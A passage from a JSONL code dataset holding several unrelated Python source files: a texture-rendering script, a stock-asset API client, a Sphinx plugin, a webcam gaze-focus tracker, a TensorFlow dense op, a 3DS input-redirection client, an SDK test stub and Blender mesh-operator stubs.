#0.1*mesh.face_planes[-1][:3]*d\n #im = scan.im(lf)\n\n #VDIR = mvg.ray_dirs(scan.K(lf), im.shape, scan.R(lf))[im.shape[0]/2, im.shape[1]/2]\n\n texel_colors = np.zeros((mesh.ntexels, 3))\n for face in xrange(6):\n print np.abs(np.dot(ut.normalized(-mesh.face_center[face] + pt), ut.normalized(mesh.face_planes[face][:3])))\n texel_colors[mesh.tex2juv[:, 0] == face] = 255*np.abs(np.dot(ut.normalized(-mesh.face_center[face] + pt),\n ut.normalized(mesh.face_planes[face][:3])))\n texel_colors *= 255/float(np.max(texel_colors))\n lighting_colors = texel_colors\n \n # geom = camo.Geom(scan, mesh)\n\n # #texel = mesh.juv2tex[5, 128, 128]\n # texel = mesh.juv2tex[2, 128, 128]\n frames = [8, 10, 13, 15]\n #ig.show([[mesh.render(scan, frame, lighting_colors), scan.im(frame)] for frame in frames])\n\n f1 = 10\n f2 = 14\n #f2 = 8\n geom = camo.Geom(scan, mesh)\n label_valid, tc1 = camo.project_texels(scan, f1, mesh, scan.im(f1), geom)\n label_valid, tc2 = camo.project_texels(scan, f2, mesh, scan.im(f2), geom)\n tc = tc1.copy()\n #ok = label_valid & (mesh.tex2juv[:, 0] == 2) & (mesh.tex2juv[:, 1] > 128)\n ok = (mesh.tex2juv[:, 0] == 1) | (mesh.tex2juv[:, 0] == 5) | (mesh.tex2juv[:, 0] == 3)\n ok = (mesh.tex2juv[:, 1] > 128)\n tc[ok] = tc2[ok]\n #ig.show(mesh.render(scan, f1, tc))\n\n vf = f1\n c1 = render_cube(scan.path, mesh, tc1, vf, 200, outline = True, frame_using_cube = True)\n c2 = render_cube(scan.path, mesh, tc2, vf, 200, outline = True, frame_using_cube = True)\n ch = render_cube(scan.path, mesh, tc, vf, 200, outline = True, frame_using_cube = True)\n ig.show([c1, c2, ch])\n return\n\n # c1 = mesh.render(scan, vf, tc1)\n # c2 = mesh.render(scan, vf, tc2)\n c1 = c2 = ''\n ch = mesh.render(scan, vf, tc)\n ig.show([c1, c2, ch])\n\n \n# def make_camo_game():\n \n# tour.tour(scan_tour, mesh, texel_colors, frames, plane_idx = 3, im_wait = 1, n = ntour,\n# mesh_occ = mesh_occ, outline_start = 0, outline_end = 1, par = par)\n"} {"ext": "py", "sha": "1a3043e75b75a97f65b6d42f53184043eeeaec1b", "content": "import urllib3.request\nimport json\nimport datetime as dt\nfrom urllib3 import exceptions as urlex\nfrom Game.periodictasks.search_alarms import AlarmSearch\nimport pandas as pn\nimport numpy as np\n\nDATE_FORMAT = '%Y-%m-%d'\n\n\ndef str_to_date(strdate):\n \"\"\"\n parses given string to date using global date format\n :param strdate:\n :return date:\n \"\"\"\n return 
dt.datetime.strptime(strdate, DATE_FORMAT)\n\n\nclass AssetComunication:\n GET_ASSETS = \"getAvailableAssets/\"\n GET_QUOTE = \"getAssetMarketPrice/\"\n GET_HISTORY = \"getAssetHistory/\"\n\n def __init__(self, url):\n self.API_URL = url\n self.alarm_search = AlarmSearch(acom=self)\n\n @staticmethod\n def has_quote(asset):\n \"\"\"\n check if an asset has a valid quote\n :param asset:\n :return boolean:\n \"\"\"\n return asset.buy != -1 and asset.sell != -1\n\n @staticmethod\n def url_to_json(url):\n \"\"\"\n fetch json data from given url\n :param url:\n :return json_response if success, 0 otherwise:\n \"\"\"\n urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)\n http = urllib3.PoolManager()\n try:\n res = http.request('GET', url)\n if res.status == 200:\n return json.loads(res.data.decode())\n else:\n return 0\n except urlex.MaxRetryError:\n return 0\n\n def get_asset_names(self):\n \"\"\"\n fetch from API all the available assets (only names)\n :return asset list:\n \"\"\"\n from Game.models import Asset\n url = self.API_URL + self.GET_ASSETS\n json_assets = self.url_to_json(url)\n asset_list = []\n try:\n if json_assets != 0:\n json_assets = json_assets['availableAssets']\n for a in json_assets:\n asset = Asset(name=a['name'], type=a['type'])\n asset_list.append(asset)\n return asset_list\n except KeyError:\n # rollback\n asset_list = []\n finally:\n return asset_list\n\n def get_asset_quote(self, asset):\n \"\"\"\n given an asset (only name is required)\n returns same asset with buy and sell price if both exists\n also searchs for alarms for the given asset.\n :param asset:\n :return asset:\n \"\"\"\n url = self.API_URL + self.GET_QUOTE + asset.name\n asset_quote = self.url_to_json(url)\n try:\n if asset_quote != 0:\n asset.buy = asset_quote['buy']\n asset.sell = asset_quote['sell']\n except KeyError:\n # rollback\n asset.buy = -1\n asset.sell = -1\n finally:\n self.alarm_search.search_for_alarms(asset=asset)\n return asset\n\n def get_asset_type(self, name):\n assets = self.get_asset_names()\n for a in assets:\n if name == a.name:\n return a.type\n return None\n\n def quote_for_assets(self, assets):\n \"\"\"\n maps asset list (only names are required) with same assets with quote\n :param assets:\n :return asset list:\n \"\"\"\n return [self.get_asset_quote(a) for a in assets if\n self.has_quote(self.get_asset_quote(a))]\n\n def get_assets(self):\n \"\"\"\n fetches all the available assets with their respective quotes\n :return asset list:\n \"\"\"\n assets = self.get_asset_names()\n return self.quote_for_assets(assets)\n\n def get_asset_history(self, name, start_date, end_date):\n \"\"\"\n get all history for given asset\n :param name:\n :param start_date:\n :param end_date:\n :return dict [{day: DayString, sell: SELL_PRICE, buy: BUY_PRICE}]:\n \"\"\"\n url = (self.API_URL + self.GET_HISTORY + name + \"/\" +\n start_date + \"/\" + end_date)\n prices = self.url_to_json(url)\n if prices == 0:\n prices = {'error': True}\n return prices\n\n def average_for_asset(self, asset):\n start_date = dt.date.today() - dt.timedelta(days=365 * 2)\n end_date = dt.date.today()\n history = self.get_asset_history(name=asset.name,\n start_date=start_date\n .strftime(DATE_FORMAT),\n end_date=end_date\n .strftime(DATE_FORMAT))\n try:\n prices = history['prices']\n\n sell = [float(p['sell']) for p in prices]\n sell_df = pn.DataFrame(np.array(sell))\n sell_data = sell_df.quantile([0.25, 0.5, 0.75]).to_dict()[0]\n sell_data['first'] = sell_data.pop(0.25)\n sell_data['avg'] = 
sell_data.pop(0.5)\n sell_data['third'] = sell_data.pop(0.75)\n\n buy = [float(p['buy']) for p in prices]\n buy_df = pn.DataFrame(np.array(buy))\n buy_data = buy_df.quantile([0.25, 0.5, 0.75]).to_dict()[0]\n buy_data['first'] = buy_data.pop(0.25)\n buy_data['avg'] = buy_data.pop(0.5)\n buy_data['third'] = buy_data.pop(0.75)\n\n asset.prices_quantiles = {\n 'buy': buy_data,\n 'sell': sell_data,\n }\n return asset\n except KeyError:\n return\n\n def get_assets_with_average(self):\n \"\"\"\n fetches all the available assets with their respective quotes\n :return asset list:\n \"\"\"\n assets = self.get_assets()\n return [self.average_for_asset(a) for a in assets if a]\n"} {"ext": "py", "sha": "1a30459009d2c7a0caf216fdf23ac44213b2089e", "content": "\"\"\"\nSphinx is hardcoded to interpret links to downloadable files relative to the root of the docs\nsource tree. However, the downloadable files we want to use (tarballs of our examples directories)\nare themselves generated at build time, and we would therefore like them to be separate from the\nsource. This module is a Sphinx plugin that replaces the normal interpretation of links, causing\nSphinx to look for downloads relative to a different directory (which is set in `conf.py`).\n\"\"\"\n\nimport logging\nimport os\nimport types\nfrom typing import Any, Dict\n\nfrom docutils import nodes\nfrom sphinx import addnodes, application\nfrom sphinx.environment.collectors import asset\nfrom sphinx.locale import __\n\nlogger = logging.getLogger(__name__)\n\n\nclass DownloadExternalFileCollector(asset.DownloadFileCollector):\n def process_doc(\n self: asset.DownloadFileCollector, app: application.Sphinx, doctree: nodes.document\n ) -> None:\n \"\"\"\n This function is different from the original method only in doing some surgery on the paths\n it finds when a separate root directory is configured.\n \"\"\"\n for node in doctree.traverse(addnodes.download_reference):\n targetname = node[\"reftarget\"]\n if \"://\" in targetname:\n node[\"refuri\"] = targetname\n else:\n rel_filename, filename = app.env.relfn2path(targetname, app.env.docname)\n if app.config.dai_downloads_root:\n filename = os.path.abspath(\n os.path.join(app.config.dai_downloads_root, rel_filename)\n )\n rel_filename = os.path.relpath(filename, app.env.srcdir)\n app.env.dependencies[app.env.docname].add(rel_filename)\n if not os.access(filename, os.R_OK):\n logger.warning(__(\"download file not readable: %s\") % filename)\n continue\n node[\"filename\"] = app.env.dlfiles.add_file(app.env.docname, rel_filename)\n\n\ndef setup(app: application.Sphinx) -> Dict[str, Any]:\n app.add_config_value(\"dai_downloads_root\", None, \"html\")\n\n # Disable the old instance of DownloadFileCollector and replace it with ours.\n for event in app.events.listeners.values():\n for listener_id, callback in list(event.items()):\n if isinstance(callback, types.MethodType) and isinstance(\n callback.__self__, asset.DownloadFileCollector\n ):\n del event[listener_id]\n app.add_env_collector(DownloadExternalFileCollector)\n\n return {\n \"version\": \"0\",\n \"parallel_read_safe\": True,\n \"parallel_write_safe\": True,\n }\n"} {"ext": "py", "sha": "1a30470af116bd430d5b4d5ce4f8e73688b844ba", "content": "# Analytics Collector\n\ndef truncate(n, decimals=0):\n multiplier = 10 ** decimals\n return int(n * multiplier) / multiplier\n\ndef startCam():\n import cv2\n from gaze_tracking import GazeTracking\n import time\n\n gaze = GazeTracking()\n webcam = cv2.VideoCapture(0)\n startTime = time.time()\n totalFrames = 
0\n framesDistracted = 0\n framesFocused = 0\n\n while True:\n _, frame = webcam.read()\n totalFrames += 1\n gaze.refresh(frame)\n frame = gaze.annotated_frame()\n\n if gaze.is_blinking():\n framesDistracted += 1\n elif gaze.is_right():\n framesDistracted += 1\n elif gaze.is_left():\n framesDistracted += 1\n elif gaze.is_center():\n framesFocused += 1\n else:\n framesDistracted += 1\n\n cv2.imshow(\"Camera\", frame)\n\n if cv2.waitKey(1) == ord('q'):\n break\n\n webcam.release()\n cv2.destroyAllWindows()\n\n totalTime = truncate(time.time() - startTime, 2)\n percentFocused = truncate((framesFocused / totalFrames) * 100, 2) \n percentDistracted = truncate((framesDistracted / totalFrames) * 100, 2)\n\n return totalTime, percentFocused, percentDistracted\n"} {"ext": "py", "sha": "1a30472cba36d282c6f9c892d0511320fa243516", "content": "# Copyright 2020 The TensorFlow Authors. All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n# ==============================================================================\n\"\"\"Stateless ops for core Keras layers.\"\"\"\nfrom __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nfrom tensorflow.python.eager import context\nfrom tensorflow.python.framework import sparse_tensor\nfrom tensorflow.python.ops import gen_math_ops\nfrom tensorflow.python.ops import math_ops\nfrom tensorflow.python.ops import nn_ops\nfrom tensorflow.python.ops import sparse_ops\nfrom tensorflow.python.ops import standard_ops\n\n\n# TODO(b/157913406): Expose this publicly.\ndef dense(inputs, kernel, bias=None, activation=None, dtype=None):\n \"\"\"Densely connected NN layer op.\n\n Arguments:\n inputs: `tf.Tensor` or `tf.SparseTensor`. Inputs to operation.\n kernel: `tf.Variable`. Matrix kernel.\n bias: (Optional) `tf.Variable`. Bias to add to outputs.\n activation: (Optional) 1-argument callable. Activation function to apply to\n outputs.\n dtype: (Optional) `tf.DType`. Dtype to cast `inputs` to.\n\n Returns:\n `tf.Tensor`. 
Output of dense connection.\n \"\"\"\n if dtype:\n if inputs.dtype.base_dtype != dtype.base_dtype:\n inputs = math_ops.cast(inputs, dtype=dtype)\n\n rank = inputs.shape.rank\n if rank == 2 or rank is None:\n if isinstance(inputs, sparse_tensor.SparseTensor):\n outputs = sparse_ops.sparse_tensor_dense_matmul(inputs, kernel)\n else:\n outputs = gen_math_ops.mat_mul(inputs, kernel)\n # Broadcast kernel to inputs.\n else:\n outputs = standard_ops.tensordot(inputs, kernel, [[rank - 1], [0]])\n # Reshape the output back to the original ndim of the input.\n if not context.executing_eagerly():\n shape = inputs.shape.as_list()\n output_shape = shape[:-1] + [kernel.shape[-1]]\n outputs.set_shape(output_shape)\n\n if bias is not None:\n outputs = nn_ops.bias_add(outputs, bias)\n\n if activation is not None:\n outputs = activation(outputs)\n\n return outputs\n"} {"ext": "py", "sha": "1a3047b1b855d6f0466d6d2bdfd5df486d535650", "content": "#!/usr/bin/env python3\n\nfrom tpp.tppflush import *\nimport sys\nfrom math import fabs\ntry:\n\timport pygame\nexcept ImportError: \n\texit(\"Pygame required. Exiting.\")\n\ntry:\n\tfrom lib.controller import *\nexcept ImportError:\n\tjoystick_name=\"??\"\n\tj_axis=[ ]\n\t\n#buttons.py adds the following:\n#joystick_name=\"Microsoft X-Box 360 pad\"\n#buttons=['B', 'A', 'Y', 'X', 'L', 'R', 'SELECT', 'START', 'Home', 'Home', 'Home']\n#j_axis=[0, 1, 3, 4]\n\ndone=False\n\ncircx,circy = 160,120\ndeadZone=0.3 #send '0' if fabs joystick(0,1) is less than this value eg joystick_x=0.1, sends joystick_x=0.0\n\n#Default button mapping\nbuttonMappings = [\n\tHIDButtons.A,\n\tHIDButtons.B,\n\tHIDButtons.X,\n\tHIDButtons.Y,\n\tHIDButtons.SELECT, #Z\n\tHIDButtons.R,\n\tHIDButtons.L,\n\tHIDButtons.START,\n\tHIDButtons.DPADUP,\n\tHIDButtons.DPADDOWN,\n\tHIDButtons.DPADLEFT,\n\tHIDButtons.DPADRIGHT\n\t]\n\nclass KBDButtons(int):\n\tHOME = pygame.K_HOME\n\tPOWER = pygame.K_END\n\n#street fighter style layout on numberpad ([punches] y,x,L -> 4,5,6)\n#might be useful for joy2key apps\nKBbutt={\n\t257: HIDButtons.B, #numberpad 1\n\t258: HIDButtons.A,\n\t259: HIDButtons.R,\n\n\t260: HIDButtons.Y, #numberpad 4\n\t261: HIDButtons.X,\n\t262: HIDButtons.L,\n\n\t256: HIDButtons.START, #numberpad 0\n\t266: HIDButtons.SELECT, #numberpad .\n\t\n\t273: HIDButtons.DPADUP, #arrow key up\n\t274: HIDButtons.DPADDOWN,\n\t276: HIDButtons.DPADLEFT,\n\t275: HIDButtons.DPADRIGHT\n\t}\n\nif len(sys.argv) < 2:\n\t#this is the pop up window\n\timport tkinter as tk \n\tclass App:\n\t\tdef __init__(self, master):\n\t\t\tframe=tk.Frame(master)\n\t\t\tframe.pack()\n\t\t\t#reads file lastIP to get first line\n\t\t\ttry:\n\t\t\t\tf=open(\"lastIP\",\"r\")\n\t\t\t\tlast_ip=f.readline()\n\t\t\t\tf.close()\n\t\t\texcept FileNotFoundError:\n\t\t\t\tlast_ip=\" \"\n\t\t\tself.l_IP=tk.StringVar() \n\t\t\tself.l_IP.set(last_ip)\n\t\t\t#image banner (row 0, col 0)\n\t\t\tlumaIMG = tk.PhotoImage(file=\"lib/luma.png\")\n\t\t\tlumal = tk.Label(frame,image=lumaIMG)\n\t\t\tlumal.image = lumaIMG\n\t\t\tlumal.grid(row=0,columnspan=3)\n\t\t\t#places the 3 other elements (label, text box, button) on row 1\n\t\t\ttk.Label(frame, text='IP:',font=(\"Courier\", 22)).grid(row=1, column=0, sticky=tk.E)\n\t\t\ttk.Entry(frame,bg='white', width=15, textvariable=self.l_IP, font=(\"Courier\", 18)).grid(row=1,column=1, pady=10, sticky=tk.E+tk.W)\n\t\t\tbutton = tk.Button(frame, text='Go', font=(\"Courier\", 18), command=self.store)\n\t\t\tbutton.grid(row=1, column=2, sticky=tk.W, pady=10)\n\t\t\t#center label and 
butt\n\t\t\tframe.grid_columnconfigure(0, weight=1)\n\t\t\tframe.grid_columnconfigure(2, weight=1)\t\t\t\n\t\t\tmaster.bind('', self.store ) #\"enter\" key\n\t\t\tmaster.bind('', self.store ) # numeric \"enter\" key\n\t\t\t\t\t\t\n\t\tdef store(self, *args):\n\t\t\tglobal IP\n\t\t\tIP=self.l_IP.get() \n\t\t\tf=open(\"lastIP\",\"w\")\n\t\t\tf.write(IP.strip()) #stores data in text box (as string type)\n\t\t\tf.close()\n\t\t\troot.quit()\n\n\n\troot= tk.Tk()\n\troot.wm_title('3DS IP')\n\tApp(root)\n\troot.bind('', lambda x: quit())\n\troot.mainloop()\n\troot.destroy() #removes window\n\tserver = IP.strip()\nelse:\n\tserver = sys.argv[1]\n\nserver=LumaInputServer(server)\n\npygame.init()\nscreen = pygame.display.set_mode((320, 240))\n\npygame.display.set_caption('touchscreen')\nbotSr = pygame.image.load('lib/bottom.png')\nscreen.blit(botSr, (0,0))\nif len(j_axis)>=6 :\n\tpygame.draw.circle(screen, (0,0,0), (circx, circy), 5, 2)\npygame.display.update()\n\npygame.joystick.init()\n\njoystick_count = pygame.joystick.get_count()\nprint(\"Number of joysticks: {}\".format(joystick_count) )\n\nif (joystick_count>0):\n\t#Only loads one joystick if multiple are connected. \n\tfor i in range(joystick_count):\n\t\tjoystick = pygame.joystick.Joystick(i)\n\t\tname = joystick.get_name()\n\t\tif name == joystick_name:\n\t\t\tbreak\n\n\tjoystick.init()\n\tprint(\"Using joystick \\\"{}\\\"\".format(name))\n\tif name == joystick_name:\n\t\tbuttonMappings=buttons\n\t\tprint(\"\\t--> loading \\\"{}\\\" layout\".format(joystick_name))\n\telse :\n\t\tprint(\"\\t(using default button layout)\")\n\n\tprint(\"\\t{} axes, {} buttons, {} hats\".format(joystick.get_numaxes(),joystick.get_numbuttons(),joystick.get_numhats()))\n\tfor i in range(joystick.get_numaxes()):\n\t\tj_axis.append(i)\nelse:\n\tprint(\"No controller found!\\n\\t(restricted to limited keyboard button layout)\")\n\nprint(\"\\nHOME = HOME key \\nPOWER = END key\\nEnd Program = ESC key\")\nwhile done==False:\n\t#Event L O O P\n\tfor event in pygame.event.get(): # User did something\n\t\tif event.type == pygame.QUIT: # If user clicked close\n\t\t\tdone=True\n\t\t#Touchscreen input\n\t\tif pygame.mouse.get_pressed()[0]:\n\t\t\tpos = pygame.mouse.get_pos()\n\t\t\tserver.touch(pos[0], pos[1])\n\t\t\t#print(\"THSC: \",pos[0],\",\",pos[1])\n\t\t\tserver.send()\n\t\telif event.type == pygame.MOUSEBUTTONUP:\n\t\t\tserver.clear_touch()\n\t\t\tserver.send()\n\t\t\n\t\t#Keyboard Mappings\n\t\telif event.type == pygame.KEYDOWN:\n\t\t\tif event.key == KBDButtons.HOME: #home\n\t\t\t\tserver.special_press(Special_Buttons.HOME)\n\t\t\t\t#print(\"HOME\")\n\t\t\tif event.key == KBDButtons.POWER: #power\n\t\t\t\tserver.special_press(Special_Buttons.POWER)\n\t\t\t\t#print(\"POWER\")\n\t\t\tif event.key == pygame.K_ESCAPE: #end program\n\t\t\t\tserver.clear_everything()\n\t\t\t\tdone = True\n\t\t\tif event.key in KBbutt:\n\t\t\t\tserver.hid_press(KBbutt[event.key])\n\t\t\t#print(event.key)\n\t\t\tserver.send()\n\t\t\t\t\n\t\telif event.type == pygame.KEYUP:\n\t\t\tif event.key == KBDButtons.HOME: #home\n\t\t\t\tserver.special_unpress(Special_Buttons.HOME)\n\t\t\tif event.key == KBDButtons.POWER: #power\n\t\t\t\tserver.special_unpress(Special_Buttons.POWER)\n\t\t\tif event.key in KBbutt:\n\t\t\t\tserver.hid_unpress(KBbutt[event.key])\n\t\t\tserver.send()\n\n\t\t# Possible joystick actions: JOYAXISMOTION JOYBALLMOTION JOYBUTTONDOWN JOYBUTTONUP JOYHATMOTION\n\t\tif event.type == pygame.JOYBUTTONDOWN :\n\t\t\t#print(\"Joystick {} button {} 
pressed.\".format(event.joy,event.button))\n\t\t\tserver.press(buttonMappings[event.button])\n\t\t\tserver.send()\n\t\tif event.type == pygame.JOYBUTTONUP:\n\t\t\t#print(\"Joystick {} button {} released.\".format(event.joy,event.button))\n\t\t\tserver.unpress(buttonMappings[event.button])\n\t\t\tserver.send()\n\t\tif event.type == pygame.JOYHATMOTION:\n\t\t\t#print(\"Joystick {} HATS moved to {}.\".format(event.joy, event.value)) \n\t\t\t(xhat, yhat) = event.value #[-1,0,1]\n\t\t\tif (xhat == 1): \n\t\t\t\tserver.press(HIDButtons.DPADRIGHT)\n\t\t\telif (xhat == -1): \n\t\t\t\tserver.press(HIDButtons.DPADLEFT)\n\t\t\telif (xhat == 0) :\n\t\t\t\tserver.unpress(HIDButtons.DPADRIGHT)\n\t\t\t\tserver.send()\n\t\t\t\tserver.unpress(HIDButtons.DPADLEFT)\n\t\t\tif (yhat == 1): \n\t\t\t\tserver.press(HIDButtons.DPADUP)\n\t\t\telif (yhat == -1): \n\t\t\t\tserver.press(HIDButtons.DPADDOWN)\n\t\t\telif (yhat == 0) :\n\t\t\t\tserver.unpress(HIDButtons.DPADDOWN)\n\t\t\t\tserver.send()\n\t\t\t\tserver.unpress(HIDButtons.DPADUP) \t\t\n\t\t\tserver.send()\n\t\tif event.type == pygame.JOYAXISMOTION:\n\t\t\t#xbox:Left Thumbstick | axis 0 : L/R | axis 1 : U/D\n\t\t\t#xbox: axis 2 : L trigger (-1:1)\n\t\t\t#xbox: Right Thumbstick | axis 3 : L/R | axis 4 : U/D\n\t\t\t#xbox: axis 5 : R trigger (-1:1)\n\t\t\t#if event.axis == 0: print(\"Joystick {} axis {} moved to {}.\".format(event.joy,event.axis, event.value))\n\t\t\t\n\t\t\tif event.axis == j_axis[0] : \n\t\t\t\tif fabs(event.value)>deadZone:\n\t\t\t\t\tserver.circle_pad_coords[0] = int(32767*event.value) #left_joy_x\n\t\t\t\telse:\n\t\t\t\t\t#note: circle_pad_neutral() == circle_pad_coords = [0,0] (that is both X and Y coords are set to zero)\n\t\t\t\t\tserver.circle_pad_coords[0] = int(0) #left_joy_x\n\t\t\t\tserver.send()\n\t\t\tif event.axis==j_axis[1] : \n\t\t\t\tif fabs(event.value)>deadZone:\n\t\t\t\t\tserver.circle_pad_coords[1] = int(-32767*event.value) #left_joy_y\n\t\t\t\telse:\n\t\t\t\t\tserver.circle_pad_coords[1] = int(0) #left_joy_y\n\t\t\t\tserver.send()\n\n#using the right trigger to touch the screen only works if you have a right trigger and right thumbstick\n\t\t\tif len(j_axis)>=6:\n\t\t\t\tif (event.axis in [j_axis[2], j_axis[3],j_axis[5]]): #r trig = mouse click\n\t\t\t\t\t(circx, circy)=(160+int(159*joystick.get_axis(j_axis[2])),120+int(119*joystick.get_axis(j_axis[3])))\n\t\t\t\t\t#draw location of touch point but only when joystick moves\n\t\t\t\t\tscreen.blit(botSr, (0,0))\n\t\t\t\t\tpygame.draw.circle(screen, (0,0,0), (circx, circy), 5, 2)\n\t\t\t\t\tpygame.display.update()\n\t\t\t\t\tif (joystick.get_axis(j_axis[5])>0.0): #Want to be able to \"drag\"\n\t\t\t\t\t\tserver.touch(circx,circy)\n\t\t\t\t\t\tserver.send()\n\t\t\t\t\t\tpygame.draw.circle(screen, (255,255,255), (circx, circy), 3, 0)\n\t\t\t\t\t\tpygame.display.update()\n\t\t\t\t\tif event.axis == j_axis[5]: #r trig\n\t\t\t\t\t\tif event.value < 0: #less than half depression #notme_irl\n\t\t\t\t\t\t\tserver.clear_touch()\n\t\t\t\t\t\t\tserver.send()\n\nprint(\"\\nClearing everything and closing program\")\nserver.clear_everything()\npygame.quit()\n"} {"ext": "py", "sha": "1a30485ecd28afd50049a68d6a991861e5e272c5", "content": "# coding: utf-8\n\n\"\"\"\n Isilon SDK\n\n Isilon SDK - Language bindings for the OneFS API # noqa: E501\n\n OpenAPI spec version: 4\n Contact: sdk@isilon.com\n Generated by: https://github.com/swagger-api/swagger-codegen.git\n\"\"\"\n\n\nfrom __future__ import absolute_import\n\nimport unittest\n\nimport isi_sdk_8_0_1\nfrom 
isi_sdk_8_0_1.models.drives_drive_firmware_node_drive import DrivesDriveFirmwareNodeDrive # noqa: E501\nfrom isi_sdk_8_0_1.rest import ApiException\n\n\nclass TestDrivesDriveFirmwareNodeDrive(unittest.TestCase):\n \"\"\"DrivesDriveFirmwareNodeDrive unit test stubs\"\"\"\n\n def setUp(self):\n pass\n\n def tearDown(self):\n pass\n\n def testDrivesDriveFirmwareNodeDrive(self):\n \"\"\"Test DrivesDriveFirmwareNodeDrive\"\"\"\n # FIXME: construct object with mandatory attributes with example values\n # model = isi_sdk_8_0_1.models.drives_drive_firmware_node_drive.DrivesDriveFirmwareNodeDrive() # noqa: E501\n pass\n\n\nif __name__ == '__main__':\n unittest.main()\n"} {"ext": "py", "sha": "1a3048e8e169005c6280a5415dd78b0a24347b37", "content": "import sys\nimport typing\n\n\ndef average_normals(average_type: typing.Union[int, str] = 'CUSTOM_NORMAL',\n weight: int = 50,\n threshold: float = 0.01):\n '''Average custom normals of selected vertices \n\n :param average_type: Type, Averaging methodCUSTOM_NORMAL Custom Normal, Take Average of vert Normals.FACE_AREA Face Area, Set all vert normals by Face Area.CORNER_ANGLE Corner Angle, Set all vert normals by Corner Angle. \n :type average_type: typing.Union[int, str]\n :param weight: Weight, Weight applied per face \n :type weight: int\n :param threshold: Threshold, Threshold value for different weights to be considered equal \n :type threshold: float\n '''\n\n pass\n\n\ndef beautify_fill(angle_limit: float = 3.14159):\n '''Rearrange some faces to try to get less degenerated geometry \n\n :param angle_limit: Max Angle, Angle limit \n :type angle_limit: float\n '''\n\n pass\n\n\ndef bevel(offset_type: typing.Union[int, str] = 'OFFSET',\n offset: float = 0.0,\n offset_pct: float = 0.0,\n segments: int = 1,\n profile: float = 0.5,\n vertex_only: bool = False,\n clamp_overlap: bool = False,\n loop_slide: bool = True,\n mark_seam: bool = False,\n mark_sharp: bool = False,\n material: int = -1,\n harden_normals: bool = False,\n face_strength_mode: typing.Union[int, str] = 'NONE',\n miter_outer: typing.Union[int, str] = 'SHARP',\n miter_inner: typing.Union[int, str] = 'SHARP',\n spread: float = 0.1,\n release_confirm: bool = False):\n '''Cut into selected items at an angle to create flat or rounded bevel or chamfer \n\n :param offset_type: Width Type, What distance Width measuresOFFSET Offset, Amount is offset of new edges from original.WIDTH Width, Amount is width of new face.DEPTH Depth, Amount is perpendicular distance from original edge to bevel face.PERCENT Percent, Amount is percent of adjacent edge length. 
\n :type offset_type: typing.Union[int, str]\n :param offset: Width, Bevel amount \n :type offset: float\n :param offset_pct: Width Percent, Bevel amount for percentage method \n :type offset_pct: float\n :param segments: Segments, Segments for curved edge \n :type segments: int\n :param profile: Profile, Controls profile shape (0.5 = round) \n :type profile: float\n :param vertex_only: Vertex Only, Bevel only vertices \n :type vertex_only: bool\n :param clamp_overlap: Clamp Overlap, Do not allow beveled edges/vertices to overlap each other \n :type clamp_overlap: bool\n :param loop_slide: Loop Slide, Prefer slide along edge to even widths \n :type loop_slide: bool\n :param mark_seam: Mark Seams, Mark Seams along beveled edges \n :type mark_seam: bool\n :param mark_sharp: Mark Sharp, Mark beveled edges as sharp \n :type mark_sharp: bool\n :param material: Material, Material for bevel faces (-1 means use adjacent faces) \n :type material: int\n :param harden_normals: Harden Normals, Match normals of new faces to adjacent faces \n :type harden_normals: bool\n :param face_strength_mode: Face Strength Mode, Whether to set face strength, and which faces to set face strength onNONE None, Do not set face strength.NEW New, Set face strength on new faces only.AFFECTED Affected, Set face strength on new and modified faces only.ALL All, Set face strength on all faces. \n :type face_strength_mode: typing.Union[int, str]\n :param miter_outer: Outer Miter, Pattern to use for outside of mitersSHARP Sharp, Outside of miter is sharp.PATCH Patch, Outside of miter is squared-off patch.ARC Arc, Outside of miter is arc. \n :type miter_outer: typing.Union[int, str]\n :param miter_inner: Inner Miter, Pattern to use for inside of mitersSHARP Sharp, Inside of miter is sharp.ARC Arc, Inside of miter is arc. 
\n :type miter_inner: typing.Union[int, str]\n :param spread: Spread, Amount to spread arcs for arc inner miters \n :type spread: float\n :param release_confirm: Confirm on Release \n :type release_confirm: bool\n '''\n\n pass\n\n\ndef bisect(plane_co: float = (0.0, 0.0, 0.0),\n plane_no: float = (0.0, 0.0, 0.0),\n use_fill: bool = False,\n clear_inner: bool = False,\n clear_outer: bool = False,\n threshold: float = 0.0001,\n xstart: int = 0,\n xend: int = 0,\n ystart: int = 0,\n yend: int = 0,\n cursor: int = 5):\n '''Cut geometry along a plane (click-drag to define plane) \n\n :param plane_co: Plane Point, A point on the plane \n :type plane_co: float\n :param plane_no: Plane Normal, The direction the plane points \n :type plane_no: float\n :param use_fill: Fill, Fill in the cut \n :type use_fill: bool\n :param clear_inner: Clear Inner, Remove geometry behind the plane \n :type clear_inner: bool\n :param clear_outer: Clear Outer, Remove geometry in front of the plane \n :type clear_outer: bool\n :param threshold: Axis Threshold, Preserves the existing geometry along the cut plane \n :type threshold: float\n :param xstart: X Start \n :type xstart: int\n :param xend: X End \n :type xend: int\n :param ystart: Y Start \n :type ystart: int\n :param yend: Y End \n :type yend: int\n :param cursor: Cursor, Mouse cursor style to use during the modal operator \n :type cursor: int\n '''\n\n pass\n\n\ndef blend_from_shape(shape: typing.Union[int, str] = '',\n blend: float = 1.0,\n add: bool = True):\n '''Blend in shape from a shape key \n\n :param shape: Shape, Shape key to use for blending \n :type shape: typing.Union[int, str]\n :param blend: Blend, Blending factor \n :type blend: float\n :param add: Add, Add rather than blend between shapes \n :type add: bool\n '''\n\n pass\n\n\ndef bridge_edge_loops(type: typing.Union[int, str] = 'SINGLE',\n use_merge: bool = False,\n merge_factor: float = 0.5,\n twist_offset: int = 0,\n number_cuts: int = 0,\n interpolation: typing.Union[int, str] = 'PATH',\n smoothness: float = 1.0,\n profile_shape_factor: float = 0.0,\n profile_shape: typing.Union[int, str] = 'SMOOTH'):\n '''Create a bridge of faces between two or more selected edge loops \n\n :param type: Connect Loops, Method of bridging multiple loops \n :type type: typing.Union[int, str]\n :param use_merge: Merge, Merge rather than creating faces \n :type use_merge: bool\n :param merge_factor: Merge Factor \n :type merge_factor: float\n :param twist_offset: Twist, Twist offset for closed loops \n :type twist_offset: int\n :param number_cuts: Number of Cuts \n :type 